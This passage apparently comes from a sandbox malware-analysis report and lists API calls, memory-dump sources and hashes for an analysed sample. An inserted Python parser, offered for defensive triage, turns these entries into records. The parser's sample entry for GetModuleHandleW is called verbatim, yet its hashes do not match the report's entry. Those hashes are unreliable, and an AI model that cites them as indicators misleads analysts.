                                                                                            • Instruction Fuzzy Hash: DC41D1B1C00618CBDB24DFA9C8487DEBBB5BF49308F6084AAD409BB251DB756946CF91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0246B8FE,?,?,?,?,?), ref: 0246B9BF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.314387683.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: DuplicateHandle
                                                                                            • String ID:
                                                                                            • API String ID: 3793708945-0
                                                                                            • Opcode ID: 1cf19b856504c2689aa87d978c608b38123789f3311b0d0d1387896fd59b7d44
                                                                                            • Instruction ID: b64e86152f5faa1a7822f4ab32a742c7428d99dab84e2ccb8ff14206ad4344eb
                                                                                            • Opcode Fuzzy Hash: 1cf19b856504c2689aa87d978c608b38123789f3311b0d0d1387896fd59b7d44
                                                                                            • Instruction Fuzzy Hash: E321E4B5900248EFDB10CF9AD584AEEBBF8EB48324F14845AE915B3310D378A954CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,024696D1,00000800,00000000,00000000), ref: 024698E2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.314387683.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 6657b0265dedb0d5648af54258cb0f60739dd64e7c79ad7864b834ca206d6904
                                                                                            • Instruction ID: e8d73147b28487be4b747100ff7f5425600d2796b653dec14ea762aed5605116
                                                                                            • Opcode Fuzzy Hash: 6657b0265dedb0d5648af54258cb0f60739dd64e7c79ad7864b834ca206d6904
                                                                                            • Instruction Fuzzy Hash: A61114B6D00249DFDB10CF9AD488AEEFBF4EB88314F14842AE415A7700C3B4A545CFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 02469656
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.314387683.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID:
                                                                                            • API String ID: 4139908857-0
                                                                                            • Opcode ID: 81d6889fa501dbe44967cc22b8c7ce07597fb8f5b0678712d2595a95d6ce9aec
                                                                                            • Instruction ID: 1c9cf55b40797246efda0679f7414b15dcfe129835cbe90431288e9330fa4763
                                                                                            • Opcode Fuzzy Hash: 81d6889fa501dbe44967cc22b8c7ce07597fb8f5b0678712d2595a95d6ce9aec
                                                                                            • Instruction Fuzzy Hash: CF11E3B5D007498FDB10DF9AD448BDEFBF4AB49724F14841AD429B7610C378A546CFA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.314387683.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 5f36ca0170810a7203abc1acde8a9ea00e21ac3af32a8a8e20582e38321a730a
                                                                                            • Instruction ID: 91096022064ce6635c64eb89ee28ba60e6670816b08fbca9081108a22ad54cb0
                                                                                            • Opcode Fuzzy Hash: 5f36ca0170810a7203abc1acde8a9ea00e21ac3af32a8a8e20582e38321a730a
                                                                                            • Instruction Fuzzy Hash: 4712B5F1412746EAD330CF67E89858D3BA1F74532AB90430AD2615BAD0D7BC194BEFA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.314387683.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e47a5f83c746b0e527a36f58696e1a1efb23a6a83cd2aa0e8f78b4805ef5c660
                                                                                            • Instruction ID: 1cde909567a42abf72fad4020315ab1c0f8817f7c6f25b2dd0f491cf9c40efa0
                                                                                            • Opcode Fuzzy Hash: e47a5f83c746b0e527a36f58696e1a1efb23a6a83cd2aa0e8f78b4805ef5c660
                                                                                            • Instruction Fuzzy Hash: 03A17D32E00219CFCF15DFB5C8885AEB7B2FF88700B15856BE805AB265EB35A945CF50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.314387683.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0312b86765e0088d2b66eef585e8e845253308cfdcf5d81d9c1d6dce547e1977
                                                                                            • Instruction ID: 2242a6663a19f1c51f6255f039c44b92d0c4035f0117120484e66a5e7c6a05df
                                                                                            • Opcode Fuzzy Hash: 0312b86765e0088d2b66eef585e8e845253308cfdcf5d81d9c1d6dce547e1977
                                                                                            • Instruction Fuzzy Hash: 05C12BF1812746EAD320DF66E89818D3BB1FB8532AF51430AD2616B6D0D7BC184BDF64
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%
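
The Code Analysis blocks in this section follow one fixed layout (an optional APIs list, a Memory Dump Source line, the Similarity identifiers, a Uniqueness Score), which makes them easy to turn into structured triage data: which dumped region of which process calls which APIs, and what the decodable constant arguments mean. The parser below is an added example written for this page, not part of the Joe Sandbox report or its tooling. Its sample input is excerpted verbatim from entries in this section; the only interpretations it adds are assumptions labelled in the comments: the first dotted field of the .sdmp file name is treated as the process index, and the first argument of RegOpenKeyExW is decoded against the documented Windows predefined HKEY_* constants.

```python
"""Parse Joe Sandbox 'Code Analysis' entries into records (added example, not report code)."""
import re
from dataclasses import dataclass, field

# Constructed sample: three entries copied verbatim from this section of the report.
SAMPLE = """\
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 02469656
Memory Dump Source
• Source File: 00000001.00000002.314387683.0000000002460000.00000040.00000001.sdmp, Offset: 02460000, based on PE: false
Similarity
• API ID: HandleModule
• API String ID: 4139908857-0
• Opcode ID: ccef59dd9dd53b9b7e053b2c9e631bbf87f43406b945b1433b3998402a445b26
• Instruction Fuzzy Hash: 457102B0A00B058FDB24DF6AD4447AAB7F5BF88314F00892ED44AD7B50DB75E8498F92
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 0147905C
Memory Dump Source
• Source File: 00000007.00000002.555845708.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: false
Similarity
• API ID: Open
• Opcode ID: 11b801878786384ff3940bfdd81f1f31be1ae51035d363ce8f64d173be9034c6
• Instruction Fuzzy Hash: 264146B0E013499FDB10CFA9C548ADEBBF5FF49318F24816AE408AB351C7799845CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 014792C9
Memory Dump Source
• Source File: 00000007.00000002.555845708.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: false
Similarity
• API ID: QueryValue
• Opcode ID: 8ca77d48beb54adbac0b981afe080c86f7274a5af14c9183eb010d96cff15450
• Instruction Fuzzy Hash: 8031DDB1D012589FCB14CFAAC984ADEBFF5BF48324F14842AE819AB350D7749945CFA1
Uniqueness

Uniqueness Score: -1.00%
"""

API_RE = re.compile(r"•\s*(\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)")
SRC_RE = re.compile(r"Source File: (\S+)\.sdmp, Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")
OPC_RE = re.compile(r"Opcode ID: ([0-9a-f]{64})")
IFH_RE = re.compile(r"Instruction Fuzzy Hash: ([0-9A-F]+)")
SCORE_RE = re.compile(r"Uniqueness Score: (-?[\d.]+)%")

# Documented Windows predefined registry root handles (winreg.h).
PREDEFINED_HKEYS = {
    0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS",
    0x80000004: "HKEY_PERFORMANCE_DATA", 0x80000005: "HKEY_CURRENT_CONFIG",
    0x80000006: "HKEY_DYN_DATA",
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: int  # call-site address as printed in the report


@dataclass
class Entry:
    process: str        # assumption: first dotted field of the .sdmp name is the process index
    region: int         # base address of the dumped memory region
    based_on_pe: bool
    apis: list = field(default_factory=list)
    opcode_id: str = ""
    insn_fuzzy: str = ""
    uniqueness: float = 0.0


def _parse_block(block):
    src = SRC_RE.search(block)
    if not src:
        raise ValueError("entry without a Memory Dump Source line")
    e = Entry(process=src.group(1).split(".")[0], region=int(src.group(2), 16),
              based_on_pe=src.group(3) == "true")
    for m in API_RE.finditer(block):
        args = tuple(m.group(3).split(",")) if m.group(3) else ()
        e.apis.append(ApiCall(m.group(1), m.group(2), args, int(m.group(4), 16)))
    if (m := OPC_RE.search(block)):
        e.opcode_id = m.group(1)
    if (m := IFH_RE.search(block)):
        e.insn_fuzzy = m.group(1)
    if (m := SCORE_RE.search(block)):
        e.uniqueness = float(m.group(1))
    return e


def parse_entries(text):
    """Split the listing at each 'Uniqueness Score' line (one per entry) and parse each block."""
    entries, cur = [], []
    for line in text.splitlines():
        cur.append(line)
        if line.strip().startswith("Uniqueness Score:"):
            entries.append(_parse_block("\n".join(cur)))
            cur = []
    return entries


def apis_by_region(entries):
    """Map (process, region base) -> sorted distinct 'MODULE!Api' names called from that region."""
    out = {}
    for e in entries:
        names = out.setdefault((e.process, e.region), set())
        names.update(f"{c.module}!{c.name}" for c in e.apis)
    return {k: sorted(v) for k, v in out.items()}


def registry_roots(entries):
    """Decode the hKey argument of RegOpenKeyEx*/RegCreateKeyEx* calls where the report shows a constant."""
    out = {}
    for e in entries:
        for c in e.apis:
            if c.name.startswith(("RegOpenKeyEx", "RegCreateKeyEx")) and c.args and c.args[0] != "?":
                out[c.ref] = PREDEFINED_HKEYS.get(int(c.args[0], 16), "non-predefined handle")
    return out


if __name__ == "__main__":
    parsed = parse_entries(SAMPLE)
    for (proc, base), names in apis_by_region(parsed).items():
        print(f"process {proc} region {base:08X}: {', '.join(names)}")
    for ref, hive in registry_roots(parsed).items():
        print(f"RegOpenKeyExW at {ref:08X} opens under {hive}")
```

Running it over the sample shows the two process-7 entries collapsing onto one dumped region (01470000) that both opens a key and queries a value, and decodes the literal 80000001 in the RegOpenKeyExW entry as HKEY_CURRENT_USER; the same functions run unchanged over the full listing copied out of the report.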

                                                                                            Executed Functions

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.555845708.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: D0jm$\em
                                                                                            • API String ID: 0-2925712236
                                                                                            • Opcode ID: 01612626f5c94baf1e60afbdf56118e832045d36f30651f97aef638758b4d667
                                                                                            • Instruction ID: 2c2958a3c2f5cda1778ef4a4ee33319121fa27721bc1d2e80e70146f482addb9
                                                                                            • Opcode Fuzzy Hash: 01612626f5c94baf1e60afbdf56118e832045d36f30651f97aef638758b4d667
                                                                                            • Instruction Fuzzy Hash: 5C92E070B002458FDB25DBB8C8947EEBBB6AF85710F14892AE109EF3A5DB74DC418791
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • SetWindowLongPtrA.USER32(00000001,00000000,00000000,00000000,?,00000000), ref: 0150DC67
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.555999443.0000000001500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LongWindow
                                                                                            • String ID: 8^jm
                                                                                            • API String ID: 1378638983-3739783712
                                                                                            • Opcode ID: 1688e2e0dc8d62d28c1af62531003d3ab14901b2ffdae7ef1cf4f73d75ac1891
                                                                                            • Instruction ID: d69c45b0937e1be7540809fea9104aaafe2fb95e9e252a73f5e8568f3e309101
                                                                                            • Opcode Fuzzy Hash: 1688e2e0dc8d62d28c1af62531003d3ab14901b2ffdae7ef1cf4f73d75ac1891
                                                                                            • Instruction Fuzzy Hash: 0832A430A002498FEB65DBE8C9547ADBBB2FF85304F24C569D409AF286DB749C85CB52
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.554865016.0000000001270000.00000040.00000001.sdmp, Offset: 01270000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c9bd6901fcd9536daacce0aa96176b980896aa93a560e1b3b343ae9928cdb543
                                                                                            • Instruction ID: 54cde8b9d9a235b3562e667f93b9ca0beb05d41188b8a92d500c3f244e294e86
                                                                                            • Opcode Fuzzy Hash: c9bd6901fcd9536daacce0aa96176b980896aa93a560e1b3b343ae9928cdb543
                                                                                            • Instruction Fuzzy Hash: 52F18E30A1020ACFDB14DFA9C884BAEBBF1FF88314F548568E505AF365DB70A945CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.555845708.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 33c1ef25cf11dbcacce06a6c4115284550e916f20d66ecfcd186c5d03ba0d81b
                                                                                            • Instruction ID: ba5f5405dc28a968a926e914badd1b862b3580b43b35094a51e1cc308df1225a
                                                                                            • Opcode Fuzzy Hash: 33c1ef25cf11dbcacce06a6c4115284550e916f20d66ecfcd186c5d03ba0d81b
                                                                                            • Instruction Fuzzy Hash: 69617C34A11609DFEB14EFB4D458AEEBBB2AF84344F118829D516AB3A4DF349845CF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(?,?,?,?,?,?,?,00000000,?), ref: 0147AA7F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.555845708.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 9f7d527145acdadc6b2253a2ddd8aad9a9c60d843ef6da72614650b9116cd684
                                                                                            • Instruction ID: 319060c2668ad89e4c10db0bfa24c26344c514cc398236da66e3cfd46d4fdf8e
                                                                                            • Opcode Fuzzy Hash: 9f7d527145acdadc6b2253a2ddd8aad9a9c60d843ef6da72614650b9116cd684
                                                                                            • Instruction Fuzzy Hash: 6E12C030A002058FCB14DFB4D854AAEBBB2EF89304F29896AD5159F3A5DB74DC46CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • SetWindowLongPtrA.USER32(00000001,00000000,00000000,00000000,00000000,00000000), ref: 0150F8F6
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.555999443.0000000001500000.00000040.00000001.sdmp, Offset: 01500000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: LongWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1378638983-0
                                                                                            • Opcode ID: 58efd904c2f19fd19f4c2d695cfc8324cce22600ee0a405a9126527cb12da803
                                                                                            • Instruction ID: 22f7bb08f531f2b4880b3a4107f43cb5af24954a030637c6527d6ad5ee65686a
                                                                                            • Opcode Fuzzy Hash: 58efd904c2f19fd19f4c2d695cfc8324cce22600ee0a405a9126527cb12da803
                                                                                            • Instruction Fuzzy Hash: 93817E30B002059BD724DBB8C858B6E77E6BFC9304F19C829D4069F395DFB59C858741
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.555845708.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 384bdca4fe1a86d80b16fdcee9daddb956c94823e5782b476708af308edb91ac
                                                                                            • Instruction ID: 59a30796076b86b40c07f1f90dcb631fa7c0fba59109cffebf842990fb1c161d
                                                                                            • Opcode Fuzzy Hash: 384bdca4fe1a86d80b16fdcee9daddb956c94823e5782b476708af308edb91ac
                                                                                            • Instruction Fuzzy Hash: 9C41E472D1035A8FCB14CFA9D4442EEBBF5AF89220F1486ABD504A7350EB749845CBE1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 0147905C
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.555845708.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: Open
                                                                                            • String ID:
                                                                                            • API String ID: 71445658-0
                                                                                            • Opcode ID: 11b801878786384ff3940bfdd81f1f31be1ae51035d363ce8f64d173be9034c6
                                                                                            • Instruction ID: 06f7cd4f1311cbe409141656211619da5536d0628568c9feb2ef22d7760aab9b
                                                                                            • Opcode Fuzzy Hash: 11b801878786384ff3940bfdd81f1f31be1ae51035d363ce8f64d173be9034c6
                                                                                            • Instruction Fuzzy Hash: 264146B0E013499FDB10CFA9C548ADEBBF5FF49318F24816AE408AB351C7799845CB91
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            APIs
                                                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 014792C9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000007.00000002.555845708.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: false
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3660427363-0
                                                                                            • Opcode ID: 8ca77d48beb54adbac0b981afe080c86f7274a5af14c9183eb010d96cff15450
                                                                                            • Instruction ID: d4cb2c880153f30344ff7db6fe020cdd756880a19a8436acd4796b78aed8e495
                                                                                            • Opcode Fuzzy Hash: 8ca77d48beb54adbac0b981afe080c86f7274a5af14c9183eb010d96cff15450
                                                                                            • Instruction Fuzzy Hash: 8031DDB1D012589FCB14CFAAC984ADEBFF5BF48324F14842AE819AB350D7749945CFA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 014792C9
Memory Dump Source
• Source File: 00000007.00000002.555845708.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: false
Similarity
• API ID: QueryValue
• String ID:
• API String ID: 3660427363-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000007.00000002.555845708.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: false
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.KERNELBASE(80000001,00000000,?,00000001,?), ref: 0147905C
Memory Dump Source
• Source File: 00000007.00000002.555845708.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: false
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000000,?,01277D89,00000800), ref: 01277E1A
Memory Dump Source
• Source File: 00000007.00000002.554865016.0000000001270000.00000040.00000001.sdmp, Offset: 01270000, based on PE: false
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,00000000,?,01277D89,00000800), ref: 01277E1A
Memory Dump Source
• Source File: 00000007.00000002.554865016.0000000001270000.00000040.00000001.sdmp, Offset: 01270000, based on PE: false
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0147E4DA), ref: 0147E5C7
Memory Dump Source
• Source File: 00000007.00000002.555845708.0000000001470000.00000040.00000001.sdmp, Offset: 01470000, based on PE: false
Similarity
• API ID: GlobalMemoryStatus
• String ID:
• API String ID: 1890195054-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• OleInitialize.OLE32(00000000), ref: 0127B745
Memory Dump Source
• Source File: 00000007.00000002.554865016.0000000001270000.00000040.00000001.sdmp, Offset: 01270000, based on PE: false
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• OleInitialize.OLE32(00000000), ref: 0127B745
Memory Dump Source
• Source File: 00000007.00000002.554865016.0000000001270000.00000040.00000001.sdmp, Offset: 01270000, based on PE: false
Similarity
• API ID: Initialize
• String ID:
• API String ID: 2538663250-0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.556305580.000000000153D000.00000040.00000001.sdmp, Offset: 0153D000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.556305580.000000000153D000.00000040.00000001.sdmp, Offset: 0153D000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.556508011.000000000154D000.00000040.00000001.sdmp, Offset: 0154D000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.556508011.000000000154D000.00000040.00000001.sdmp, Offset: 0154D000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.556305580.000000000153D000.00000040.00000001.sdmp, Offset: 0153D000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000007.00000002.556305580.000000000153D000.00000040.00000001.sdmp, Offset: 0153D000, based on PE: false
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions